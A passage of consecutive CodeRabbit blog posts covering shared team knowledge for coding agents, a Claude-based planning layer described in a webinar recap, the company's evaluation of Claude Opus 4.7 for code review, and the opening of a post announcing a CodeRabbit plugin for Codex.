should compound.** Instead of a context file lingering on one developer’s machine, every code review, resolved ticket, and architectural discussion should feed a layer that makes the agent more useful next month than it is today. This is a shared knowledge layer, scoped by team, project and domain. 
When a new engineer joins, the agent already carries the institutional memory that probably lived in a few senior engineers' heads.

**Work should persist and be resumable.** Start a task in a Slack thread. Get interrupted. Hand it to a teammate. Come back two days later, and the work is still there. It’s visible, commentable, and resumable by anyone with the right access. It’s not trapped in a browser tab on one developer’s laptop.

**The agent should be governed like any other system with production access.** Most coding agents today are priced per seat and scoped per user. Your spend is whatever your developers happen to burn. Your access controls are whatever the tool defaults to, which is usually "everything." Your visibility into what the agent is actually doing across your org is approximately zero. You wouldn't give every engineer root access to prod. There's no reason to give an AI agent flat access to your entire org's context, either.

**Context should be auto-assembled from everywhere, not pasted in by hand.** The agent should pull from your codebase, tickets, docs, observability stack, cloud infrastructure, and the knowledge your team has built up over time. The developer's job is to direct the agent, not to be its research assistant.

The No. 1 complaint about coding agents is that they generate throwaway code: too much rework and too many iterations before something is actually mergeable. Better context on the first pass, however, means better code on the first pass.

## **Where this goes**

Today, we are introducing [CodeRabbit Agent for Slack](https://coderabbit.link/agent). We're starting with the core loop: planning, code generation, review, investigation, and knowledge-augmented development. One agent for your entire Software Development Lifecycle. It’s all inside Slack, synchronous, and with guardrails in place. But the vision is bigger than a coding agent in Slack.
What we're building toward is an agentic layer across the entire SDLC, a layer that understands systems, connects tools, retains the team's knowledge, and executes engineering workflows end-to-end. * Post-deploy regression triage that correlates a Datadog spike to a specific commit and drafts the fix, without anyone having to manually assemble the context. * Breaking change detection that traces downstream consumers across repos before you merge. * Customer bug investigation that starts from a support ticket, checks your error logs, finds the root cause, and posts a preliminary analysis to the team. * Sprint digests that pull from Linear, GitHub, Datadog, and PostHog. We believe the agent is only as useful as the context it can reach and the actions it can take. *The endgame is the layer that connects the stack and makes it programmable from the place where your team already works.* ## **The bet** Individual productivity is up across every engineering team adopting AI. Team-level productivity is still stuck, and it's stuck for three reasons that have nothing to do with model quality: there's no explainable record of what the agent actually did, no cost attribution that matches how teams are organized, and the agent doesn't live where engineering actually happens. Solve those, and team productivity starts to compound the way individual productivity already has. The agents that win won't be the ones with the best model. They'll be the ones that already know your systems when you open them — the conventions, the deprecations, the decisions that didn't make it into a doc. That's durable team knowledge, and it's what's missing from every tool shipping today. I'm not going to tell you this replaces developers. If you've shipped production code, you know that the hard part of engineering isn't typing. It's judgment. It's understanding the system. It's knowing what to build and what not to build. At CodeRabbit, this is the bet we've been making for years. 
Our independent, purpose-built context engine, running two million code reviews a week, is how we've encoded what good engineering teams actually do. CodeRabbit Agent extends that engine into Slack with your team's own decisions and patterns on top. Work happens in the open, where teammates can see it, jump in, and pick up where someone left off. Context compounds, rather than dying at the end of a session.

***Whoever solves agent amnesia wins. Whoever keeps building faster with amnesiac agents is building a faster version of the wrong thing.***

Sources for Figure 1: Becker, J., Rush, N., Barnes, E., & Rein, D. *Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity*. METR, July 10, 2025; Xu, F., Medappa, P. K., Tunc, M. M., Vroegindeweij, M., & Fransoo, J. C. *AI-assisted Programming May Decrease the Productivity of Experienced Developers by Increasing Maintenance Burden*. arXiv:2510.10165, 2025.

Measure twice, cut once: How CodeRabbit built a planning layer on Claude

David Kravets — Tue, 21 Apr 2026 00:00:00 GMT

David Loker was building something for himself. A side project, a secure infrastructure system wrapped around a memory engine, with a chat interface layered on top so he could test it. Nothing earth-shattering. Just a developer doing what developers do on weekends. He had a clear vision. Everything to be locked behind a login. Users authenticated. Sessions tied to accounts. The whole thing to be secure from the start. So Loker, the VP of AI at CodeRabbit, fired up Claude Code and let it run. He described what he wanted. He iterated. He watched the tokens flow. For hours, the system churned, building, compiling and progressing. When it finally came back and told him it was done, Loker leaned in to try it out. He asked how to log in. The system told him to use his user token. He asked where to get the token. There was no answer. Because there was no login page. There was no way to create a user. There was no authentication flow of any kind. The application had been built, thoroughly, diligently and correctly around the concept of a user without ever being given the instructions to actually create one. "That was just something I missed," Loker said, recounting the story during a recent webinar with Anthropic. "I missed the fact that that is something I needed to specify. I wasn't clear." Hours of compute. A functionally sophisticated application. Completely unusable without further work. ## A tax nobody talks about CodeRabbit sits inside the pull request workflow of engineering teams around the world. From that vantage point of processing tens of millions of code reviews, CodeRabbit sees AI-assisted development from the inside out. But volume and velocity are only part of the story. The other part is harder to talk about. Yes, AI coding tools make developers faster. Pull requests per developer are up 20%. Features ship quicker. Backlogs shrink. The productivity gains are real. But so are the costs on the other side of the ledger. Incidents are up 23.5%. 
AI-generated code produces 1.7x more issues than human-written code. Readability problems have spiked 3x. Loker calls it AI's hidden quality tax. And his argument, laid out in a [webinar](https://www.anthropic.com/webinars/how-coderabbit-orchestrates-agents-to-strengthen-ai-generated-code) alongside Anthropic Applied AI Engineer Ethan Dixon and moderated by Anthropic Account Executive Brittney Tong, is that most people are misdiagnosing the cause. "I'm trying to say that this is not necessarily just a model issue," Loker told the audience. "This is actually a product of how we leverage the tools." The model isn't broken. The workflow is. ## The assumption nobody knew they were making During the webinar, there was a live poll asking the audience where AI projects go wrong. The results weren't close. The overwhelming answer, important requirements were assumed, not stated. It's a deceptively simple problem. When a developer sits down to describe a feature to an AI coding agent, they carry with them years of context about their codebase, their team's conventions, and their company's infrastructure. Things that feel so obvious they barely register as assumptions. But an AI has none of that background. Neither does a new hire. An AI often will just fill in the gaps and keep building. "We have things in our head that we didn't know at some point and we had to be taught. And then we kind of have these things and we assume everybody knows them. And we make that assumption of the AI system as well,” Loker said, reacting to the poll results. The login page wasn't missing because the AI failed. It was missing because Loker, like practically every developer who has ever used AI coding tools, was working from a mental model that felt complete, and wasn't. ## When passing tests isn't enough What makes this failure mode so insidious is that it can be nearly invisible until late in the process. The code compiles. The tests pass. The build moves forward. 
By every traditional metric, things are going fine. And then you go to log in and there's nothing there. "We can have passing tests, but passing tests doesn't mean we solved the underlying problem," Loker said. "Sometimes the issue is not in the code compilation." This isn't a new kind of failure exactly. Developers have always built the wrong thing sometimes. Misalignment between intent and output is as old as software itself. What's changed is the speed at which it compounds. Before AI coding tools, building a feature took long enough that problems tended to surface naturally along the way. You'd pause to think through the next step. You'd explain what you were doing to a colleague. The work itself created moments of reflection. AI removes most of that friction, which is the point, and largely a good thing. But it also means you can now travel very far in the wrong direction before anything stops you. The feedback loop that used to take days now needs to be deliberately designed back in, because it no longer happens on its own. "Syntax generation is a fairly fast endeavor," Loker observed, "but if you go too far down a path and you find that gap too late, it can be costly to go back." ## A lesson from his father Growing up in Canada, Loker spent a lot of time building things around the house with his father. Fences. Decks. A finished basement. His father had a saying he repeated constantly, the kind of saying that drives children crazy precisely because it's right, “measure twice, cut once.” "You cut that piece of wood, that's it," Loker explained. "It's either the right length or you gotta go back and use something else and start again. That used to infuriate me as a kid, this idea of always slowing things down. But ultimately it leads to a faster overall process once you’re doing those things more carefully and making sure you’re doing the right thing." 
The other saying, equally maddening to a kid in a hurry: “less haste, more speed.” "I do now see," Loker said, "that we can go really fast with Claude Code. And at the end of the day, it's better to understand that we're building the wrong thing earlier than to go through many hours of iterations and then come out at the end and realize we didn't really build the thing that we wanted to build." These are ancient engineering principles. They predate software by centuries. But AI has changed the economics in a way that makes them newly urgent. When an agent can generate thousands of lines of code in minutes, the cost of going in the wrong direction has never been higher. ## The problem with the way devs work The dominant pattern for using AI coding tools today is what Loker calls the prompt-only workflow. A developer types a description into the prompt, the agent executes, code comes out. It's fast. It's intuitive. It's also where assumptions go to hide. "A lot of times that's where I miss my assumptions," Loker said, "because I'm not actively engaging and thinking through and reviewing that process. I'm kind of doing it stream of consciousness." The individual problem is costly enough. At the team level, it becomes structural. When one developer on a team prompts an agent in isolation, their assumptions, their context, and their interpretation of the requirements are not visible to anyone else. Teammates can't catch what they can't see. Senior engineers can't flag the architectural decision that doesn't account for the company's existing Redis setup. Product managers can't spot the feature scope that drifted from the original spec. The assumptions are scattered, silent, and compounding. ## Planning as an engineering discipline Dixon offered a technical lens on why planning matters that goes beyond process. 
At Anthropic, they think deeply about what they call context engineering, the practice of managing what information goes into an AI model's attention window, and when. Context, Dixon explained, is a finite resource. Every token added to a prompt competes with every other token for the model's attention. Load too much, load the wrong things, or load them at the wrong time, and the model's coherence over long tasks degrades. Dixon noted that Opus 4.6 has made meaningful strides in long-context coherence, climbing leaderboards on tests like needle-in-a-haystack, but added that "context engineering is not a solved problem." Planning, he argued, is how you get ahead of that problem rather than chasing it mid-execution. "What's really neat about treating planning as this sort of proactive means of context engineering," Dixon said, "is you get all of this front work preloaded. You do all the exploration, you do the discovery work, you come up with a really coherent plan and that makes the behavior of the agent in the long run much more effective." Without that upfront investment, agents spend expensive compute re-reading files, backtracking when they hit unexpected bugs, and re-establishing context they should have had from the start. Planning, in this framing, isn't just good project management. It's good systems architecture. ## The missing layer above the agent CodeRabbit's answer to all of this is [CodeRabbit Plan](https://coderabbit.link/planlayer), an orchestration layer that sits above the coding agent, directing it rather than replacing it. The distinction matters to Loker. "This planning system is not meant to take out the Claude Code planning system," he said. "It's meant as a higher level orchestration of that to point it in a really narrow and right direction again and to be collaborative, so that everything that needs to be explicit is made explicit." The workflow begins in the issue tracker. 
When a ticket arrives from Jira, Linear, GitHub Issues, or GitLab, the planner gets to work. With Claude Opus as the main brain and orchestration loop, it explores the codebase, pulls in relevant context from past pull requests, surfaces implicit assumptions, and generates a structured coding plan broken into reviewable phases. Crucially, that plan is a team artifact. It’s visible, editable, and versioned before any code is written. "The plan itself…is a quality gate," Loker said. "If we can make that really good... the downstream effect is very pronounced. You end up with a lot better code at the end of it." ## Three models, one planner CodeRabbit Plan doesn't run on a single AI model. It runs on three: Claude Opus, Sonnet, and Haiku. Each model is matched, in Loker's words, to the complexity of the task at hand. Opus sits at the center. Loker described it as "the main brain and the orchestration loop," responsible for the highest-level reasoning in the system. "It's making the higher level, very strategic decisions," he said, "doing some understanding of what do I need to understand, what don't I know about the problem, and how can I sort of set a strategy up in order to discover that information systematically." Sonnet operates at what Loker described as "a slightly lower level with maybe slightly more targeted tasks": structured work that is well-defined but still substantive. Haiku handles the most granular layer, the lower-complexity tasks and context distillation. Loker gave a concrete example of what that looks like in practice: "Here's a big file. I need this function out of it. I need to understand what it does, but I don't really need the code." By using Haiku for that kind of extraction, the system avoids burning expensive Opus or Sonnet tokens on work that doesn't require them. "The token cost is cheaper with Haiku, it's faster," Loker said. "And so doing that, and that's going to happen a lot, you're saving a lot of cost and time." 
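The tiering Loker describes can be pictured as a small routing table. What follows is a minimal sketch, not CodeRabbit's implementation: the task labels (`strategy`, `targeted`, `distill`), the `Task` type, and the choice of Sonnet as a fallback are all illustrative assumptions.

```python
from dataclasses import dataclass
from enum import Enum


class Tier(Enum):
    OPUS = "opus"      # high-level strategy and orchestration
    SONNET = "sonnet"  # well-defined but still substantive work
    HAIKU = "haiku"    # extraction and context distillation


@dataclass(frozen=True)
class Task:
    description: str
    kind: str  # hypothetical label: "strategy", "targeted", or "distill"


# Hypothetical mapping from task kind to model tier.
ROUTES = {
    "strategy": Tier.OPUS,
    "targeted": Tier.SONNET,
    "distill": Tier.HAIKU,
}


def pick_tier(task: Task) -> Tier:
    """Return the tier for a task; unknown kinds fall back to Sonnet (an assumption)."""
    return ROUTES.get(task.kind, Tier.SONNET)


summary_task = Task("Summarize what this function does", kind="distill")
print(pick_tier(summary_task).value)  # prints "haiku"
```

The point of the table is the one Loker makes: the most expensive tier is reserved for the decisions that need it, and frequent, narrow extraction work goes to the cheapest one.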
Dixon's framing for the Haiku tier: "I treat it as Sonnet-light for most use cases." He added that where Haiku starts to show strain is under pressure. “Once you've traversed many files or you are halfway through a very complex plan, that is where I think you start to see the degradation of a Haiku-class model versus Sonnet," he said. The goal of the entire tiering, Loker said, is straightforward: "Just use the brain of the operation in the spot where it's needed and not everywhere." ## Getting the eval right Building the planner required building something CodeRabbit didn't have: an evaluation system for planning quality, not just code quality. And that, Loker acknowledged, was harder than expected. "Initially it's hand-tuned,” Loker said. “We have to do a lot of manual inspection. We have to slowly build up a good set of LLM judges that can evaluate certain aspects of the plan." One surprise: finding the right level of detail in the plan itself. Too detailed, and the plan becomes stale the moment the code starts evolving. "Finding that tipping point was difficult. It required a lot of iterations." There was another insight that came later. It was measuring the tokens consumed during the exploration phase, and using that as a signal for whether the planning step was actually producing downstream efficiency. Because the system ultimately outputs code, you can evaluate the code and compare it to what comes out when you skip the planning step entirely. Dixon noted that this kind of evaluation discipline generalizes: "Teams building products on top of this type of technology can actually benefit a lot by thinking about what is the sort of right level of granularity for their domain." ## The record of work There's a benefit to collaborative planning that goes beyond the immediate output, and Loker spent time on it during the webinar. 
When a team works through a plan together, surfacing assumptions, debating scope, and aligning on success criteria, they create a record of what was decided and why. "If somebody new comes in and they want to understand how did we build this, why did we build it,” Loker said, “there's now a record of that. It's not ephemeral." That record serves as a validation tool too. When the code comes back, the team can check it against the original plan and not just against test results, but against intent. Did this do what we said we were going to do? Did it meet the success criteria we agreed on? ## The oldest idea made urgent again Dixon summed up a new reality, a new stage of sorts, of AI coding. "Plan quality is this new sort of distinct moment within generally LLM-driven knowledge work." It's not a new idea. Engineers have always known that understanding what you're building, really understanding it, not just gesturing at it, is the difference between a project that ships and one that gets reworked three times before anyone admits it's wrong. What's new is the economics. AI has compressed the time between intention and execution so dramatically that the cost of misalignment has gone asymmetric. You can now build in hours what used to take weeks. Which means you can now be wrong, at scale, faster than ever before. The login page story is funny in retrospect. Hours of tokens, a sophisticated application, no way to log in. But it's also a parable for an industry that is still learning that the bottleneck has moved. Writing code used to be the bottleneck. AI moved it. The bottleneck now is knowing what to write, and making sure everyone agrees before the first line is generated. Loker's father had it right all along. Measure twice, cut once. Less haste, more speed. It just took an AI coding agent and a missing login page to make the lesson stick. *CodeRabbit Plan is available now. [Try it here.](https://coderabbit.link/planlayer)*

What Claude Opus 4.7 means for AI code review

Juan Pablo Flores — Thu, 16 Apr 2026 00:00:00 GMT

You know the bug that ships on a Friday because the reviewer was rushing through a 40-file PR? The race condition buried three files deep that nobody traces until it pages someone at 2 AM? That's the gap AI code review was built to close. With Claude Opus 4.7, the gap just got a lot narrower. CodeRabbit's review engine doesn't rely on a single model. We run an ensemble of frontier models from multiple labs, selecting different models for different aspects of the review pipeline. Each model earns its slot through evaluation on real code. When a new frontier model ships, we benchmark it against every model in our current ensemble to see where it outperforms and where it doesn't. We've been testing it at CodeRabbit against our production code-review pipeline. The results aren't marginal improvements. We ran Opus 4.7 head-to-head across 100 evaluation points spanning a multitude of real-world open-source pull requests. Claude Opus 4.7 finds more real bugs, produces more actionable feedback, and reasons across files *better than anything we've tested before*. ## **How we evaluate models at CodeRabbit** Before diving into the results, it's worth understanding how we benchmark code-review models. Methodology matters as much as outcomes. Our evaluation framework is built around what we call Error Patterns (EPs): a curated set of 100 known issues drawn from actual pull requests across major open-source projects. Each EP maps to a specific, verified issue in a real PR: a race condition in a Go service, a missing null check in a React component, an authorization bypass in a Rails controller. For every model we test, we measure four core dimensions: 1. **Pass rate:** Does the model catch the known issue? 2. **Actionability**: Does the feedback tell the developer exactly what to fix? 3. **Comment Quality**: Does the model correctly classify severity? Is the output well-structured and code-backed? 4. 
**Signal-to-noise**: How much useful feedback does the model produce relative to noise? We scored Opus 4.7 against our current production baseline on the exact same rubric, across the same 100 EPs, on the same PRs. No cherry-picking, no special prompting for one model over the other. ## **Model performance on code reviews** Integrating Opus 4.7 in CodeRabbit delivers a jump in review quality across various metrics that we track. ![Performance comparison of AI code review: Claude Opus 4.7 significantly surpasses baseline metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/Figure1_Code_Review_aa8d4eb168.png) ### **Pass rate** On our core evaluation, whether the model catches the known issue in a given PR, integrating Opus 4.7 to CodeRabbit’s current code review harness passed on 68 out of 100 evaluation points, up from 55 on the baseline. That's a **24% relative improvement** in the model's ability to find the specific bug that matters. To put this in practical terms: imagine a team that merges 20 PRs a week, each containing at least one reviewable issue. With the baseline model, roughly 11 of those issues get caught. With Opus 4.7, that number jumps to nearly 14\. Over a quarter, that's roughly 36 additional bugs caught before they reach production. ### **Full-system score** When we layer in our full scoring system (which accounts for outside-diff context, nitpick filtering, and overall review coherence), the gap widens further. Integrating Opus 4.7 scored **74/100** compared to the baseline's **60/100**, a **23% relative improvement**. This metric captures something subtler than raw bug detection. A model might catch a bug but do so in a way that's confusing, references the wrong line, or buries the finding in unrelated noise. The full-system score penalizes those failure modes and rewards reviews that are coherent, well-targeted, and properly contextualized within the broader PR. 
The fact that Opus 4.7's full-system score improved by 14 points, slightly *more* than the 13-point gain in raw pass rate, suggests the presentation quality improved alongside detection. The reviews are more coherent, better targeted, and properly contextualized. ### **Actionable review rate** Every single one of Opus 4.7's 640 comments was marked actionable by our evaluator, meaning each one contained enough information for a developer to act on. But when we measure against EP-specific actionability (whether the actionable comment actually addresses the target issue rather than a tangential concern), **it jumped from 54% to 64%**. This is the difference between a reviewer who says "there's a problem somewhere in this file" and one who says "line 47 will panic when the user is nil because the guard clause on line 42 doesn't cover the `admin` role path. Here's a diff that fixes it." Both are technically actionable. Only the second one saves you time. ### **Important-issue yield** This is one of the most striking data points in our evaluation. Nearly **70% of all comments** Opus 4.7 generated were classified as important, meaning they flagged substantive bugs, security risks, or correctness problems rather than style nits or cosmetic suggestions. Of those 443 important comments, 367 were findings the model surfaced *beyond* the target evaluation point. That's 82.8% of all important output coming from issues the model discovered on its own, unprompted, while reviewing the same code. In other words, Opus 4.7 behaves less like a targeted test and more like a thorough reviewer who notices problems in the periphery while looking at the code you pointed it at. For context, the baseline model generated 558 total comments. Integrating **Opus 4.7 generated 640, about 15% more volume**. But the important-issue density is what sets it apart. More comments don't matter if they're noise. More *important* comments are a different story entirely. 
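For readers who want to check the headline numbers in this section, the arithmetic can be reproduced in a few lines. This is only a sketch using the counts quoted above; the helper names and the 13-week quarter are assumptions, not part of the evaluation harness.

```python
def relative_improvement(baseline: float, new: float) -> float:
    """Percentage gain of `new` over `baseline`."""
    return (new - baseline) / baseline * 100


def share(part: float, whole: float) -> float:
    """`part` as a percentage of `whole`."""
    return part / whole * 100


# Pass rate and full-system score (out of 100 evaluation points).
print(round(relative_improvement(55, 68), 1))  # 23.6
print(round(relative_improvement(60, 74), 1))  # 23.3

# Team example: 20 PRs per week, one reviewable issue per PR.
baseline_caught = 20 * 55 / 100  # 11.0 per week
opus_caught = 20 * 68 / 100      # 13.6 per week
WEEKS_PER_QUARTER = 13           # assumption; the post does not state it
print(round((opus_caught - baseline_caught) * WEEKS_PER_QUARTER, 1))  # 33.8

# Comment volume and important-issue yield.
print(round(share(443, 640), 1))                # 69.2, important comments
print(round(share(367, 443), 1))                # 82.8, found beyond the target
print(round(relative_improvement(558, 640), 1))  # 14.7, extra comment volume
```

The quarterly figure depends on rounding and on how many weeks are counted: the unrounded weekly rates over 13 weeks give about 34 extra catches, in the same range as the "roughly 36" quoted above.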
## **What makes Opus 4.7 different under the hood** The scores above establish that Opus 4.7 is better. What follows explains *why*, and what it actually looks like when this model reviews your code. We spent significant time reading through individual comments, and several patterns emerged consistently across languages and codebases. ![Presentation slide highlighting Opus 4.7's Deep Bug Detection, cross-file bug connection, and fix-shipping reviews.](https://victorious-bubble-f69a016683.media.strapiapp.com/Figure_2_Different_8b48d54617.png) ### **Deep, mechanism-level bug finding** Across our evaluation set, the model consistently identified concrete races, nil/panic paths, authorization failures, blacklist bypasses, XSS and SSRF chains, response-shape mismatches, and lifecycle/data-loss bugs. In Go codebases, the model traced concurrent access patterns across goroutines to identify real race conditions: not just "this looks like it might have a race" but "goroutine A writes to `cache.entries` on line 137 while goroutine B reads it on line 140 with no synchronization, which will panic under concurrent load." It named the specific data structure, the specific lines, and the specific failure mode. In TypeScript/React code, it followed event handler lifecycles to spot state-management bugs. It tracked how a `useEffect` cleanup function interacted with an async fetch, identified the exact window where a stale closure could cause a state update on an unmounted component, and proposed a cancellation-token pattern as the fix. In Ruby on Rails controllers, it identified authentication bypass vectors that arise from parameter handling edge cases, the kind of subtle permissiveness that a human reviewer might miss on a Friday afternoon but an attacker won't miss on a Saturday. 
In Java (Keycloak specifically), it caught contract mismatches between service interfaces and their implementations, tracing through multiple layers of abstraction to identify where a runtime exception would surface. In Python (Sentry), it identified silent failure paths where exceptions were caught too broadly, causing data-processing pipelines to swallow errors and produce incomplete results without any visible alert. ### **Cross-file reasoning** One of the most impressive capabilities, and the one that benefits most from the expanded context window, is the model's ability to connect findings across files. Given a diff, it traces helper-level contracts to downstream breakage and compares behavior across related methods, handlers, or providers. Opus 4.7 can tell you that the parameter *was* used by two downstream callers that the PR author forgot to update and that one of those callers will now silently fall back to a default value that breaks the billing calculation for enterprise accounts. Our analysis confirmed this pattern: the model "often connects helper-level contracts to downstream breakage and compares behavior across related methods, handlers, or providers." We observed this consistently across dozens of review sessions spanning five different language ecosystems. ### **Patch-oriented output** The review style is extremely code-centric, and this is where the practical developer experience shines: * **99.1%** of comments contain inline code references (specific variable names, function calls, line numbers) * **74.5%** include full code blocks demonstrating the issue or the fix * **78.0%** include actual diffs showing the proposed remediation ![Breakdown of review comment content showing 99.1% in-code references and 78% proposed remediation.](https://victorious-bubble-f69a016683.media.strapiapp.com/figure3_coments_7b08d307a7.png) In practice, most comments arrive with a ready-to-apply fix. 
The average comment runs **1,124 characters across 21 lines**, reading like a mini design review rather than a drive-by annotation. A typical comment opens with a bold, verdict-style summary ("Race condition in cache invalidation"), follows with a concise mechanism/impact explanation (2-3 paragraphs tracing the specific code path), and closes with a concrete diff wrapped in a collapsible `<details>` block. ## **The tone shift: Direct and opinionated** If you've used earlier Claude models for code review, the tone of Opus 4.7 will feel noticeably different. Anthropic describes it as "more direct and opinionated, with less validation-forward phrasing." Our evaluation quantifies this shift. Opus 4.7's review comments have an **assertiveness rate of 77.6%** and a **hedging rate of just 16.5%**. It leads with a bold, verdict-style summary of the issue, follows with a concise mechanism/impact explanation, and then presents a concrete patch. The language uses clear imperatives: "Guard against nil," "Prevent concurrent access," "Validate input before processing" rather than tentative suggestions. Our tone analysis summarized it well: "Comments read like detailed mini code reviews. They open with a bold, verdict-style summary of the issue, follow with 1–3 explanatory paragraphs, and then present a concrete patch in diff form. The tone is confident and directive, using clear imperatives rather than tentative phrasing." For maintainers, this is a welcome shift. When a model tells you "this will panic on nil input" instead of "you might want to consider checking for nil," you save cognitive overhead and can act on the feedback faster. In a busy review queue, that directness multiplies across dozens of comments per day. The hedging that does remain is well-placed. It appears primarily around subjective or domain-specific decisions, for instance, flagging a localization string as potentially incorrect and suggesting "please have a native speaker confirm." That's appropriate humility. The model is confident where it has evidence and careful where it doesn't. **Want to see this in action?** [Try CodeRabbit on your next PR](https://coderabbit.link/NcmblIe) \- free to start, no credit card required. See Opus 4.7-powered reviews on your own code. ## **What it's actually like to code with Opus 4.7** Benchmarks tell you how a model performs on a rubric. 
They don't tell you what it feels like to sit down with it and build something. Our engineering team has been hands-on with Opus 4.7 for coding tasks beyond code review, and a few patterns emerged. ### **It talks to you: A lot** The first thing you notice is how communicative the model is. As it works, the model narrates: what it's doing, why, which variables it's modifying, which files it's touching, and what its reasoning is at each step. The tone isn't conversational; it’s tactical. Every token carries information, optimized for context transfer rather than warmth. If you're new to working with AI coding assistants, this is great. You get a running commentary that doubles as a learning tool. But if you're an experienced developer who's used to terse, get-it-done interactions, it can feel over-communicative. There's a calibration period where you learn to skim the explanations and focus on the code output. The same depth we measured in the review benchmarks carries over. ### **Speed and reasoning scale together** Opus 4.7 has a strong sense of task complexity. When you give it something simple (rename a variable, add a guard clause, write a utility function), it moves fast. When you give it something genuinely hard (refactor a state machine, redesign an authentication flow, untangle a circular dependency), it takes more time to reason, and you can feel the difference. Even on complex tasks, the overall velocity is noticeably faster than previous models. The model seems to understand *how much thinking a task deserves* and allocates accordingly, so it doesn't waste your time over-reasoning on trivial work. In practice, this means you can move through a task backlog at speeds we haven't seen before. Simple changes fly by. Complex changes take longer but arrive with fewer bugs and better structure. ### **Code quality is high out of the gate** Across our first batch of hands-on sessions, the code quality was consistently strong. 
We encountered very few bugs during initial exploration; the kind of "it runs but doesn't work" failures that typically plague first-pass AI-generated code were notably rare. The model seems to get the logic right on the first try more often than not. There's a nuance here for frontend work. Opus 4.7 is excellent at the *logic* of UX: the placement of elements, the flow between states, the interactive behavior of components. But it doesn't have great design taste. The UI it generates is functional and well-structured, but it won't win any design awards. If you're building a prototype or an internal tool, that's fine. If you're building a consumer-facing product, expect to bring your own design system and use the model for the logic layer. ### **It understands messy prompts** One thing that surprised us: Opus 4.7 is remarkably good at interpreting imprecise prompts. You don't need to write perfectly structured instructions. You can be vague, incomplete, or even somewhat contradictory in your prompt, and the model will generally infer what you actually meant and produce something useful. In real-world usage, developers are thinking faster than they're typing. They don't want to spend time crafting the perfect prompt, and with Opus 4.7, they don't have to. This tracks with what our benchmarks show in the code-review context. The model appears to reason about broader intent and context rather than treating each instruction as an isolated directive. ### **The self-review loop: Powerful but sometimes overeager** One of the more interesting behaviors we observed is that Opus 4.7 will often go back and review its own work after completing a task. It'll generate the code, then scan it for issues, then attempt to fix what it found, all without being asked. This self-correction loop can be genuinely valuable. It catches things the model missed on the first pass and improves the final output. But there's a downside. Sometimes the model overthinks it. 
It'll identify a "problem" in otherwise clean code and start reworking sections that didn't need to be touched, introducing unnecessary changes or even new issues in the process. The model's thoroughness occasionally tips over into over-correction. For developers, the practical advice is to review the model's self-edits with the same scrutiny you'd apply to any code change, and don't hesitate to roll back the second pass if the first one was already correct. ### **Surprising creative range** This was unexpected: Opus 4.7 is genuinely good at creative work. When we asked for titles, taglines, naming suggestions, and creative copy, the model produced results that felt original. It also performed well on graphical tasks: generating images, logos, vector graphics, and pixel art with a level of quality and coherence that went beyond what we expected from a model primarily known for code and reasoning. For developers who wear multiple hats (and most of us do), that creative range means you can use the same model for both the code and the marketing page that explains it. ## **Where we see room for improvement with Claude Opus 4.7** No model is perfect, and we'd rather be upfront about the rough edges than have you discover them yourself. 1. **Severity calibration is aggressive.** As the breakdown above shows, the model skews toward `critical` and `major`. While many of those labels are justified, the model also applies `critical` to speculative security surfaces, migration risks, and test-only failures that don't meet a strict rubric for that level. Identical comment text occasionally receives different severity labels across similar contexts, reflecting annotation instability we need to smooth out. We're tuning our post-processing pipeline to normalize these before they reach developers. 2. **Comment density is high.** The raw output is more "exhaustive audit" than "focused review." Not every PR needs 19 comments. 
Our filtering, ranking, and deduplication layers are essential to turning this into a usable signal that doesn't overwhelm developers. 3. **Duplicate findings across evaluation contexts.** We observed that the model sometimes produces near-identical comments across related code paths: for example, the same null-check warning applied to three similar handler functions. While each instance is technically correct, the repetition inflates apparent coverage and adds noise. Deduplication by normalized text \+ file/line is a necessary post-processing step, and we've seen cases where 30 \- 40 raw comments collapse to 10 \- 20 unique findings after deduplication. 4. **The over-correction instinct.** As we noted in our hands-on section, the model's self-review behavior (which is a strength in many contexts) can sometimes lead to unnecessary rework. In a code-review context, this manifests as the model flagging code patterns that are intentional or idiomatic as potential issues. The model's thoroughness is a feature, but its calibration on when to stop is still a work in progress. ![Graphic showing Opus 4.7 coding strengths like bug catching and review quality, with caveats.](https://victorious-bubble-f69a016683.media.strapiapp.com/figure4_pro_con_d213042f1a.png) ## **What integrating Opus 4.7 means for CodeRabbit users** We're actively integrating Opus 4.7 into our review pipeline. Here's what you can expect as we roll it out: * **More bugs caught before merge.** The pass-rate and full-system improvements we detailed above translate directly into fewer escaped bugs. Over weeks and months, that compounds into meaningfully fewer production incidents, fewer hotfixes, and fewer late-night on-call pages. * **Feedback you can act on immediately.** Most findings arrive with inline code and ready-to-apply diffs. For many of them, you'll be able to apply the suggested change directly, review it, and move on, saving minutes per comment and hours per week. 
* **Better cross-file awareness.** If your PR updates a shared utility but forgets to update one of its three callers, Opus 4.7 is significantly more likely to catch that than previous models. Complex refactors and multi-file changes get smarter coverage. Opus 4.7 represents a step function in what's possible with AI-assisted code review. Stronger reasoning, broader context, more actionable output, configurable depth. The gap between AI review and expert human review continues to narrow. The AI isn't replacing the human reviewer. It's covering the ground that humans don't have time for. If you haven't tried CodeRabbit yet, there's never been a better time. Connect your repository in under two minutes. The model got a lot smarter, and so did your code reviews. [**Get started with CodeRabbit**](https://coderabbit.link/NcmblIe) \- connect your repo, get your first AI review in minutes. Free to try, no credit card required.

Introducing the CodeRabbit plugin for Codex

Juan Pablo Flores — Wed, 15 Apr 2026 00:00:00 GMT

Staying in flow matters. The moment a developer has to leave the current session to run a review somewhere else, wait for results, and context-switch back to act on findings, that momentum breaks. The CodeRabbit plugin for Codex brings AI-powered code reviews directly into the same surfaces where developers are already writing and iterating on code, so they can get structured feedback while the work is still fresh and move faster from draft to pull request. That matters most when a developer is already using agents to write, edit, and refine code inside the same session. Feedback lands better when it shows up before a change reaches a pull request, while the developer still has full context. Catching issues at that stage shortens review cycles, reduces back-and-forth, and helps teams ship with fewer surprises. %[https://youtu.be/NDcFLXQ3BhA] Bringing review into the same session where code is being written is the gap we wanted to close. A developer can ask Codex to "review my current changes with CodeRabbit" and the agent handles the rest: checking whether the [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is installed, running authentication, executing the review against the working branch, and returning findings ordered by severity. All without leaving the terminal or the Codex app. ## How it Works At its core, the CodeRabbit plugin helps Codex run reviews without pushing the developer into a separate workflow. In practice, the flow looks like this: 1. A developer asks Codex to review the current changes using CodeRabbit. 2. The plugin checks whether the [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is installed and whether the user is signed in. 3. Codex picks the right review target and runs CodeRabbit against the relevant changes. 4. Findings come back ordered by severity inside the same working session. 5. The developer can act on that feedback immediately or ask the agent to help fix the issues and review again. 
